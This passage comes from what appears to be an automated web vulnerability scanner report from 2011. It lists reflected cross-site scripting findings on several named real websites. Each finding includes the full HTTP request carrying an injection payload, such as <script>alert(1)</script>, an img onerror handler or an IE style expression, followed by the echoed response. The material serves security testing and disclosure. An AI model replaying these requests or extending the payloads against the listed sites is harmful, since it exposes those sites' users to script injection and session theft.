This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/sprite-widget-logos.png8a301"a%3d"b"aa15a3c938b?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 68
Status: 404
Vary: Accept-Encoding
Content-Length: 36592
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:16 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/images/sprite-widget-logos.png8a301"a="b"aa15a3c938b">
...[SNIP]...

2.46. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93259"a%3d"b"03e6d5a7576 was submitted in the REST URL parameter 1. This input was echoed as 93259"a="b"03e6d5a7576 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets93259"a%3d"b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 64
Status: 404
Vary: Accept-Encoding
Content-Length: 36521
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:19:59 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets93259"a="b"03e6d5a7576/multiwidget3/SMH/FM-BUSINESS">
...[SNIP]...

2.47. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/SMH/FM-BUSINESS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7024f"a%3d"b"33aba3305a9 was submitted in the REST URL parameter 2. This input was echoed as 7024f"a="b"33aba3305a9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget37024f"a%3d"b"33aba3305a9/SMH/FM-BUSINESS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Status: 404
Vary: Accept-Encoding
Content-Length: 36513
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:20:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget37024f"a="b"33aba3305a9/SMH/FM-BUSINESS">
...[SNIP]...

2.48. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47c6"a%3d"b"bc6e98538a1 was submitted in the REST URL parameter 1. This input was echoed as b47c6"a="b"bc6e98538a1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgetsb47c6"a%3d"b"bc6e98538a1/multiwidget3/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 63
Status: 404
Vary: Accept-Encoding
Content-Length: 36663
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:21:33 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgetsb47c6"a="b"bc6e98538a1/multiwidget3/WAT/FM-NEWS">
...[SNIP]...

2.49. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mozo-widgets.f2.com.au
Path:   /widgets/multiwidget3/WAT/FM-NEWS

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41da"a%3d"b"4bceb315c12 was submitted in the REST URL parameter 2. This input was echoed as c41da"a="b"4bceb315c12 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /widgets/multiwidget3c41da"a%3d"b"4bceb315c12/WAT/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.5
Status: 404
Vary: Accept-Encoding
Content-Length: 36655
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Date: Wed, 07 Sep 2011 14:22:51 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie8"> <![endif]-->
<!--[if
...[SNIP]...
<link rel="canonical" href="http://mozo.com.au/widgets/multiwidget3c41da"a="b"4bceb315c12/WAT/FM-NEWS">
...[SNIP]...

2.50. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the PID request parameter is copied into the HTML document as plain text between tags. The payload 90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac was submitted in the PID parameter. This input was echoed as 90e3c<img src=a onerror=alert(1)>504638d47ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img%20src%3da%20onerror%3dalert(1)>504638d47ac&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:15:59 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("The PID looks like it was cut-off (\"sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch90e3c<img src=a onerror=alert(1)>504638d47ac\"). This PID is 76 character(s) long, when it should be 32 characters long.");

2.51. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7ac77<script>alert(1)</script>25eedfac9ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp7ac77<script>alert(1)</script>25eedfac9ac HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: max-age=300
Expires: Wed, 07 Sep 2011 14:23:20 GMT
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:19 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp7ac77<script>alert(1)</script>25eedfac9ac({"context":"","listInfo":{"itemCount":20,"totalCount":22},"items":[{"airdate":1315379040000,"assets":[{"assetType":"Reference Image","encodingProfile":"","height":366,"URL":"http://content.video.news.
...[SNIP]...

2.52. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the endIndex request parameter is copied into the HTML document as plain text between tags. The payload 50d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8 was submitted in the endIndex parameter. This input was echoed as 50d2d<img src=a onerror=alert(1)>282c5ab2dc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=2050d2d<img%20src%3da%20onerror%3dalert(1)>282c5ab2dc8&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:36 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid01 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"2050d2d<img src=a onerror=alert(1)>282c5ab2dc8\"");

2.53. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef was submitted in the query parameter. This input was echoed as b5e97<img src=a onerror=alert(1)>b9a0d61c0ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=1&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789b5e97<img%20src%3da%20onerror%3dalert(1)>b9a0d61c0ef&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:18:18 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid03 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Invalid ID parameter found: 841970789b5e97<img src=a onerror=alert(1)>b9a0d61c0ef");

2.54. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ndm.feeds.theplatform.com
Path:   /ps/JSON/PortalService/2.1/getReleaseList

Issue detail

The value of the startIndex request parameter is copied into the HTML document as plain text between tags. The payload 8faab<img%20src%3da%20onerror%3dalert(1)>69586683c36 was submitted in the startIndex parameter. This input was echoed as 8faab<img src=a onerror=alert(1)>69586683c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ps/JSON/PortalService/2.1/getReleaseList?PID=sd_f83nBw8ui5CQcrU8nqqGqLVaIDlch&startIndex=18faab<img%20src%3da%20onerror%3dalert(1)>69586683c36&endIndex=20&field=title&field=description&field=thumbnailURL&field=length&field=assets&field=PID&field=requestCount&field=contentID&field=length&field=airdate&query=categoryIDs|841970789&callback=_jqjsp HTTP/1.1
Host: ndm.feeds.theplatform.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Wed, 07 Sep 2011 14:16:25 GMT
X-Cache: MISS from feeds.theplatform.com
Via: 1.0 sea1squid02 (squid/3.0.STABLE23)
Connection: close

_jqjsp("Illegal argument. For input string: \"18faab<img src=a onerror=alert(1)>69586683c36\"");

2.55. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /rubicon_sync

Issue detail

The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f4d5"><script>alert(1)</script>2124e81ff80 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:15:21 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 07-Sep-2011 14:15:01 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 264

<html><body><img width="0" height="0" src="http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/2f4d5"><script>alert(1)</script>2124e81ff80?publisher_dsp_id=2101&external_user_id=435e5758-1bdb-4563-ab69-51d400bd766e&Expiration=1315836921"/>
...[SNIP]...

2.56. http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 was submitted in the cb parameter. This input was echoed as e1761<img src=a onerror=alert(1)>6d23c9e6b04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&cb=PluckSDK.jsonpcb('request_0')e1761<img%20src%3da%20onerror%3dalert(1)>6d23c9e6b04 HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 3964
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:14:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')e1761<img src=a onerror=alert(1)>6d23c9e6b04({
"Envelopes": [
{
"PayloadType": "Responses.Users.UserResponse",
"Payload": {
"User": {
"Age": "",
"Sex": "None",
"AboutMe": "",

...[SNIP]...

2.57. http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.abc.net.au
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jsonRequest request parameter is copied into the HTML document as plain text between tags. The payload 82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66 was submitted in the jsonRequest parameter. This input was echoed as 82bb7<img src=a onerror=alert(1)>faa916c3a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22Payload%22%3A%7B%22ObjectType%22%3A%22Requests.Users.UserRequest%22%2C%22UserKey%22%3A%7B%22Key%22%3A%22%22%2C%22ObjectType%22%3A%22Models.Users.UserKey%22%7D%7D%2C%22PayloadType%22%3A%22Requests.Users.UserRequest%22%7D%5D%2C%22Metadata%22%3Anull%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D82bb7<img%20src%3da%20onerror%3dalert(1)>faa916c3a66&cb=PluckSDK.jsonpcb('request_0') HTTP/1.1
Host: pluck.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=242052946.1543285740.1315422868.1315422868.1315422868.1; __utmb=242052946.2.10.1315422868; __utmc=242052946; __utmz=242052946.1315422868.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL02WSITEMABC1proddmlocal
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1409
Vary: Accept-Encoding
Expires: Wed, 07 Sep 2011 14:14:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close
Set-Cookie: SiteLifeHost=SJL02WSITEMABC1proddmlocal; domain=abc.net.au; path=/

PluckSDK.jsonpcb('request_0')({
"Envelopes": [
{
"PayloadType": "Responses.System.InvalidRequestExceptionResponse",
"Payload": {
"IsCachedResponse": false,
"Obj
...[SNIP]...
ests.Users.UserRequest\",\"UserKey\":{\"Key\":\"\",\"ObjectType\":\"Models.Users.UserKey\"}},\"PayloadType\":\"Requests.Users.UserRequest\"}],\"Metadata\":null,\"ObjectType\":\"Requests.RequestBatch\"}82bb7<img src=a onerror=alert(1)>faa916c3a66",
"ExceptionCode": "InvalidOrMalformedRequest",
"ExceptionLevel": "Error",
"ExceptionMessage": "Exception while deserializing request: JsonReaderException:
...[SNIP]...

2.58. http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.ntnews.com.au
Path:   /poll/poll.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6941f"style="x:expression(alert(1))"5dc6096cd9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /poll/poll.php/6941f"style%3d"x%3aexpression(alert(1))"5dc6096cd9d HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:06 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n47 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: no-cache
Content-Length: 1168
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

